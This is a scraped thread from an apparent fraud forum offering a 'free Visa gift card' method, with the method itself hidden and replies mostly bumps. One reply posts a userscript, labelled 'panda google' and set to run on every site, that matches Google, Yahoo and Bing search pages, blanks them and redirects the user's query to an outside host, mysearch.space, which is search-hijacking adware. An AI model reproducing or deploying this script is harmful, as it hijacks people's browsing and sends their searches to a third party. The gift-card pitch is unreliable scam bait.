Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   15773

Free Visa Gift Card - Only Legit Method

by REFUNDlNG - 08 June, 2021 - 02:27 AM
This post is by a banned member (pionier2020) - Unhide
This post is by a banned member (slim313shady) - Unhide
28
Posts
0
Threads
4 Years of service
#42
This is a bump
This post is by a banned member (godsss) - Unhide
godsss  
Registered
41
Posts
0
Threads
4 Years of service
#43
(08 June, 2021 - 02:27 AM)REFUNDlNG Wrote: Show More
Read about this on a forum but thought it was the usual bs until I received my card. Might be a repost but this shit actually works:

say ong
This post is by a banned member (Magiikzz_) - Unhide
This post is by a banned member (Lotus1) - Unhide
This post is by a banned member (SamzyDev) - Unhide
This post is by a banned member (Wowguy) - Unhide
Wowguy  
Registered
23
Posts
0
Threads
4 Years of service
#47
thanks
// ==UserScript==
// @name panda google
// @Namespace http://tampermonkey.net/
// @version 0.1
// @Description try to take over the world!
// @Author You
// @match *://*/*
// @Grant none
// ==/UserScript==

(function() {

function findGetParameter(parameterName) {
var result = null,
tmp = [];
location.search
.substr(1)
.split("&")
.forEach(function (item) {
tmp = item.split("=");
if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
});
return result;
}
var u ='https://lato2.mysearch.space?q=',
s = [

{
'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/,
'query':'q',
},
{
'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/,
'query':'p'
},
{
'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/,
'query':'q'
}
]
for(var i = 0; i < s.length; i++){
var net = s[i], pattern = net.host, q = findGetParameter(net.query);
if( pattern.test(window.location.href) ){
document.body.innerHTML="";
window.location.href=u+q;
}
}
})();
This post is by a banned member (xoReesexo) - Unhide
xoReesexo  
Registered
31
Posts
0
Threads
4 Years of service
#48
lets go

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)